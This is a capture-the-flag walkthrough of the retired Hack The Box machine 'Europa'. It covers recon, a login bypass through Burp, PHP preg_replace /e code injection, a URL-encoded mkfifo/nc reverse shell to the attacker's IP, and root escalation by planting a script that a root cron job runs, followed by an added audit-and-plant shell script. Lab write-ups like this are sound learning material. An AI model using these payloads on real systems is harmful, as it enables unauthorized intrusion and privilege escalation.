
Hackthebox.eu - Retired - Europa




Recon


As always I start with a simple open/closed sweep of all 65535 TCP ports.
$ nmap -T4 -p- -oX ./nmapb.xml europa.htb


Then I convert the XML to HTML to make it pretty (xsltproc picks up the nmap stylesheet referenced inside the XML):
$ xsltproc ./nmapb.xml -o ./nmapb.html



Ports 22, 80 and 443 are open.

Looks like this box is going to be mostly web based.

Let's run nmap again with the -A switch (OS detection, version detection, default scripts and traceroute) against just those three ports.

$ nmap -T4 -A -p22,80,443 -oX ./nmapf.xml europa.htb

Then we convert that output to HTML as well:
$ xsltproc ./nmapf.xml -o ./nmapf.html





Looks like we have an Ubuntu box running a fairly new version of OpenSSH on port 22 and Apache httpd 2.4.18 on 80 and 443.


Let's check out those Apache sites.

Both are just the default Apache install page.

We get a little more information from the TLS certificate on 443, though.


The certificate is issued for europacorp.htb, so that should be the box's real hostname.

I ran a bunch of scans against both names:
europa.htb
europacorp.htb

Tried dirb and DirBuster against each and didn't find anything…

Looking back at the nmap results (the ssl-cert script output) I see another name in the certificate:


admin-portal.europacorp.htb

The certificate also gives us an email address:

admin@europacorp.htb



Exploit





Adding admin-portal.europacorp.htb to /etc/hosts and browsing to it: woot, we got a login page.

Tried some generic SQLi here but got nowhere in the browser. The email field is validated client-side, so the browser refuses to submit anything in it that isn't shaped like an email address.




What if we send the request through Burp instead? Client-side validation only runs in the browser; once we edit the request in the proxy it can't stop us.


We get a redirect.


We are in.



None of the links on the dashboard are real; they all just point back to dashboard.php.

However there is this tools section.

It lets a user input an IP address, presumably the address of the OpenVPN server, and generates an OpenVPN config file for connecting to the company VPN…

But as an attacker, what do we have here? A way to feed the server some input that it then processes. Hopefully we can use this to get our foothold.

This is what the request looks like in Burp.



If we look at the HTML source of the generator form we can see a hidden input.



There is a field named pattern with /ip_address/ as its value.

Since that is wrapped in slashes it looks like a regular expression, which makes me think the code generating the config is doing a regex replace with our input.

There is a fairly well-known deprecated modifier for PHP's preg_replace(): /e. It was deprecated in PHP 5.5 and removed in 7.0, but on older PHP it is still honoured, so it is worth trying here.



Here is a blog post about why it was deprecated.



If we can append /e to the pattern field, preg_replace() will eval() the replacement string as PHP code after substituting in the match. Judging by the form, the pattern is matched against the text field and the replacement is the ipaddress field, so ipaddress is where our PHP goes. One catch: the replacement is only evaluated when the pattern actually matches, so the text we submit has to contain whatever the pattern looks for. (The proper fix on the developer's side is preg_replace_callback(), or plain str_replace() where no regex is needed.)

So we can use our input to inject PHP code into the request.


So let's try to ping our VPN IP.

In PHP that would look like this:

system('ping -c 10 10.10.14.42')

For this to survive the request we need to encode the spaces in our command. In a form-encoded body a + decodes to a space, so we can just swap them in:

system('ping+-c+10+10.10.14.42')

First let's set up a listener on our end:

$ sudo tcpdump -i tun0 -n icmp

That is tcpdump on just the tun0 interface, showing only ICMP.

Here is what I ended up with for my request. pattern=/changed/e with text=changed guarantees exactly one match, so the replacement is evaluated once:

pattern=%2Fchanged%2Fe&ipaddress=system('ping+-c+10+10.10.14.42')&text=changed


And my tcpdump output shows the pings coming in.


OK, so the proof of concept works: we have blind command execution on the box as the web server user.

Let's try to get a shell.

I tried a couple of reverse shells but finally had luck with the mkfifo one.

In its generic form it looks like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Then of course we need to edit that for our VPN IP and listener port:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 5555 >/tmp/f

Now we need to URL-encode it. This payload is full of characters that mean something to the form parser (an unencoded & would end the parameter, and / ; | > are safer encoded too), so this time everything non-alphanumeric gets percent-encoded rather than just swapping spaces for +.

I used a website to do it:

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff

Before we send this to tools.php we need to set up our listener:


$ nc -lnvp 5555

Here is my final request:

pattern=%2Fchanged%2Fe&ipaddress=system('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff')&text=changed

Sent that to tools.php using burp annnnnnnnnddddddddd


We got a shell, we got a shell, we got a shell hey hey hey hey




Poking around the system, we can already grab the user flag from /home/john.





I used wget to transfer LinEnum.sh to the Europa box and ran it (after giving it execute rights).

I saw this in the output:




Here is a cron job that runs every minute as root. Coool.

Let's see what it does.

$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

So it blanks out access.log……

But then it calls a script in /var/www/cmd/ named logcleared.sh.

Let's see what is in that script.


Nothing: it doesn't exist. But we have write access to /var/www/cmd/, so we can create it ourselves, and root will exec() whatever we put there every minute :)


So I made one with this line:


cat /root/root.txt  >> /tmp/circusmonkey/root.txt

Copied it over using wget and my SimpleHTTPServer.

Waited a minute.

Then cat'd the file.
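The general version of the check that found this, as an added example (my code, not from the original writeup): given the command a root cron job runs (and, as here, the command inside the script it calls), list every absolute path that is already writable by us or that is missing but sits in a directory we can write to; /var/www/cmd/logcleared.sh is the second case. The demo recreates the Europa layout under a temporary directory, which is a constructed setup, and the planted script gets a shebang and exec bit, which the writeup does not mention but which exec() in the cron job relies on. Run the audit as the low-privilege user you actually have; as root, -w is always true.

```sh
#!/bin/sh
# Added example, not from the original writeup: the check behind this privesc,
# written generally. Given the command a root cron job runs (and, as here, the
# commands inside the scripts it calls), report every absolute path that is
# already writable by us, or missing but creatable because its directory is
# writable. /var/www/cmd/logcleared.sh is the second case.
# Run it as the low-privilege user you actually have: as root -w is always true.

# One line per absolute path in the command: "<path> <verdict>".
audit_cron_command() {
  set -f                            # no globbing while we split the command
  for tok in $1; do
    tok=${tok%;}                    # tolerate a trailing ';' separator
    case "$tok" in
      /*) ;;                        # only absolute paths are interesting
      *) continue ;;
    esac
    if [ -e "$tok" ]; then
      if [ -w "$tok" ]; then verdict=WRITABLE-EXISTING; else verdict=ok; fi
    elif [ -w "$(dirname "$tok")" ]; then
      verdict=MISSING-IN-WRITABLE-DIR
    else
      verdict=missing
    fi
    printf '%s %s\n' "$tok" "$verdict"
  done
  set +f
}

# Exit 0 when the command gives us a hijack point.
cron_command_hijackable() {
  audit_cron_command "$1" | grep -q -e 'WRITABLE-EXISTING' -e 'MISSING-IN-WRITABLE-DIR'
}

# Create the script root will run. Shebang and exec bit both matter: PHP's
# exec() hands the path to sh -c, which needs a runnable file.
plant_script() {                    # plant_script <path> <command to run as root>
  printf '#!/bin/sh\n%s\n' "$2" > "$1" && chmod 755 "$1"
}

# Constructed demo: rebuild the Europa layout under a temp dir so it runs anywhere.
demo() {
  root=$(mktemp -d)
  mkdir -p "$root/var/www/cmd"      # writable directory, logcleared.sh absent
  cmd="/usr/bin/php /var/www/cronjobs/clearlogs; $root/var/www/cmd/logcleared.sh"
  audit_cron_command "$cmd"
  if cron_command_hijackable "$cmd"; then
    plant_script "$root/var/www/cmd/logcleared.sh" \
      'cat /root/root.txt >> /tmp/circusmonkey/root.txt'
  fi
  rm -rf "$root"
}
demo
```

On the real box you would feed audit_cron_command the command from the root crontab, then the exec() target you read out of /var/www/cronjobs/clearlogs; the second call is the one that flags /var/www/cmd/logcleared.sh as MISSING-IN-WRITABLE-DIR. The same check also catches the more common variant where the script exists but is world-writable.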

